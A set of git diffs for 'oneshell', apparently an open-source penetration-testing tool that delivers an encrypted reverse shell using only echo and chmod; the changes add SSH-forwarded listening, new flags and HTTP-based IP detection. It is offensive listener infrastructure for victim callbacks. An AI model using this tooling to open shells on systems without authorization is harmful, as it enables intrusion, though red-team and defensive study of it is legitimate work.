tantosec · danieltanto · Jul 16, 2024 · Jul 30, 2024 · Jul 30, 2024 · Jul 30, 2024
diff --git a/README.md b/README.md
@@ -2,6 +2,10 @@
 
 ![image](https://github.com/user-attachments/assets/4a390578-47cb-423a-87ca-ad681a46731c)
 
+# Blog
+
+For a detailed explanation of how the tool works, check out my blog on the topic [here](https://tantosec.com/blog/oneshell/).
+
 # Installation
 
 **Docker**
@@ -67,8 +71,6 @@ It turns out that there are a few ways to do this, mostly involving the `openssl
 
 "One Shell To Rule Them All", or `oneshell` for short, is a tool that can solve this problem. It does this by running an encrypted reverse shell using only the `echo` and `chmod` commands.
 
-To find out how it works, check out my blog on the topic [here](https://tantosec.com/blog/oneshell/).
-
 # Detailed requirements for a successful payload
 
 * Target can connect to your listener via TCP

diff --git a/cmd/root.go b/cmd/root.go
@@ -2,10 +2,12 @@ package cmd
 
 import (
 	"log"
+	"net"
 	"os"
 
 	"github.com/spf13/cobra"
 	"github.com/tantosec/oneshell/pkg"
+	"golang.org/x/crypto/ssh"
 )
 
 var rootCmd = &cobra.Command{
@@ -21,20 +23,57 @@ additional code allowing the program to download a Golang binary containing the
 			log.Fatal(err)
 		}
 
+		sshHost, err := cmd.Flags().GetString("ssh")
+		if err != nil {
+			log.Fatal(err)
+		}
+
 		target, err := cmd.Flags().GetString("target")
 		if err != nil {
 			log.Fatal(err)
 		}
 
+		bypassSanityCheck, err := cmd.Flags().GetBool("bypass-ssh-sanity-check")
+		if err != nil {
+			log.Fatal(err)
+		}
+
+		listenAddress, err := cmd.Flags().GetString("listen-address")
+		if err != nil {
+			log.Fatal(err)
+		}
+
+		var sshConn *ssh.Client = nil
+
+		dialer := net.Dial
+
+		if sshHost != "" {
+			sshConn, err = pkg.ConnectToSSHHost(sshHost, listenAddress, port, bypassSanityCheck)
+			if err != nil {
+				log.Fatal(err)
+			}
+			dialer = sshConn.Dial
+		}
+
 		if target == "" {
-			target, err = pkg.GetMyIP()
+			target, err = pkg.GetIPUsingDialer(dialer)
 			if err != nil {
-				log.Fatalf("failed to automatically detect public ip: %v", err)
+				log.Fatalf("failed to automatically detect IP: %v", err)
 			}
-			log.Println("Target unspecified, using public IP")
+			log.Println("Target unspecified, using public IP:", target)
+		}
+
+		listener := pkg.Listener{
+			Listen:  net.Listen,
+			Address: listenAddress,
+			Port:    port,
+		}
+
+		if sshConn != nil {
+			listener.Listen = sshConn.Listen
 		}
 
-		err = pkg.Listen(target, port)
+		err = pkg.Listen(listener, target)
 		if err != nil {
 			log.Fatalf("error occurred when listening: %v", err)
 		}
@@ -49,6 +88,9 @@ func Execute() {
 }
 
 func init() {
-	rootCmd.Flags().StringP("target", "t", "", "Target IP/hostname for the victim to connect to (this machine). If left blank, will try and identify public IP automatically")
-	rootCmd.Flags().Uint16P("port", "p", 443, "Port to listen on")
+	rootCmd.Flags().StringP("target", "t", "", "Target IP/hostname for the victim to connect back to. If left blank, will try and identify automatically. Usually the public IP of the listening machine.")
+	rootCmd.Flags().StringP("listen-address", "l", "0.0.0.0", "IP address to listen on")
+	rootCmd.Flags().Uint16P("port", "p", 9001, "Port to listen on")
+	rootCmd.Flags().StringP("ssh", "s", "", "Name of SSH config file entry. If specified will listen on <port> on the remote machine instead of the local port")
+	rootCmd.Flags().Bool("bypass-ssh-sanity-check", false, "Bypass the test connection to the SSH machine to check if the SSH port forward works")
 }
diff --git a/go.mod b/go.mod
@@ -3,12 +3,13 @@ module github.com/tantosec/oneshell
 go 1.22.2
 
 require (
-	github.com/pion/stun v0.6.1
 	github.com/spf13/cobra v1.8.1
 )
 
 require (
 	github.com/inconshreveable/mousetrap v1.1.0 // indirect
+	github.com/kevinburke/ssh_config v1.2.0 // indirect
+	github.com/mitchellh/go-homedir v1.1.0 // indirect
 	github.com/pion/dtls/v2 v2.2.7 // indirect
 	github.com/pion/logging v0.2.2 // indirect
 	github.com/pion/transport/v2 v2.2.1 // indirect

diff --git a/go.sum b/go.sum
@@ -4,6 +4,10 @@ github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c
 github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
 github.com/inconshreveable/mousetrap v1.1.0 h1:wN+x4NVGpMsO7ErUn/mUI3vEoE6Jt13X2s0bqwp9tc8=
 github.com/inconshreveable/mousetrap v1.1.0/go.mod h1:vpF70FUmC8bwa3OWnCshd2FqLfsEA9PFc4w1p2J65bw=
+github.com/kevinburke/ssh_config v1.2.0 h1:x584FjTGwHzMwvHx18PXxbBVzfnxogHaAReU4gf13a4=
+github.com/kevinburke/ssh_config v1.2.0/go.mod h1:CT57kijsi8u/K/BOFA39wgDQJ9CxiF4nAY/ojJ6r6mM=
+github.com/mitchellh/go-homedir v1.1.0 h1:lukF9ziXFxDFPkA1vsr5zpc1XuPDn/wFntq5mG+4E0Y=
+github.com/mitchellh/go-homedir v1.1.0/go.mod h1:SfyaCUpYCn1Vlf4IUYiD9fPX4A5wJrkLzIz1N1q0pr0=
 github.com/pion/dtls/v2 v2.2.7 h1:cSUBsETxepsCSFSxC3mc/aDo14qQLMSL+O6IjG28yV8=
 github.com/pion/dtls/v2 v2.2.7/go.mod h1:8WiMkebSHFD0T+dIU+UeBaoV7kDhOW5oDCzZ7WZ/F9s=
 github.com/pion/logging v0.2.2 h1:M9+AIj/+pxNsDfAT64+MAVgJO0rsyLnoJKCqf//DoeY=

diff --git a/pkg/getip.go b/pkg/getip.go
@@ -1,56 +1,28 @@
 package pkg
 
 import (
-	"github.com/pion/stun"
+	"fmt"
+	"io"
+	"net"
+	"net/http"
 )
 
-// Based off https://github.com/Snawoot/extip/blob/master/extip.go
-func QueryStunServerForIp(server string) (string, error) {
-	family := "udp4"
-	c, err := stun.Dial(family, server)
-	if err != nil {
-		return "", err
+func GetIPUsingDialer(dial func(network, addr string) (net.Conn, error)) (string, error) {
+	client := http.Client{
+		Transport: &http.Transport{
+			Dial: dial,
+		},
 	}
-	defer c.Close()
 
-	message, err := stun.Build(stun.TransactionID, stun.BindingRequest)
+	resp, err := client.Get("http://ifconfig.me/")
 	if err != nil {
-		return "", err
+		return "", fmt.Errorf("failed to perform HTTP request: %v", err)
 	}
 
-	clientOut := make(chan stun.Event)
-	clientErr := make(chan error)
-
-	go func() {
-		err := c.Do(message, func(res stun.Event) {
-			clientOut <- res
-		})
-		if err != nil {
-			clientErr <- err
-		}
-	}()
-
-	select {
-	case err := <-clientErr:
-		return "", err
-	case res := <-clientOut:
-		if res.Error != nil {
-			return "", res.Error
-		}
-		var xorAddr stun.XORMappedAddress
-		if err := xorAddr.GetFrom(res.Message); err == nil {
-			return xorAddr.IP.String(), nil
-		} else {
-			var mappedAddr stun.MappedAddress
-			if err := mappedAddr.GetFrom(res.Message); err == nil {
-				return mappedAddr.IP.String(), nil
-			} else {
-				return "", err
-			}
-		}
+	body, err := io.ReadAll(resp.Body)
+	if err != nil {
+		return "", fmt.Errorf("failed to read response body: %v", err)
 	}
-}
 
-func GetMyIP() (string, error) {
-	return QueryStunServerForIp("stun.l.google.com:19302")
+	return string(body), nil
 }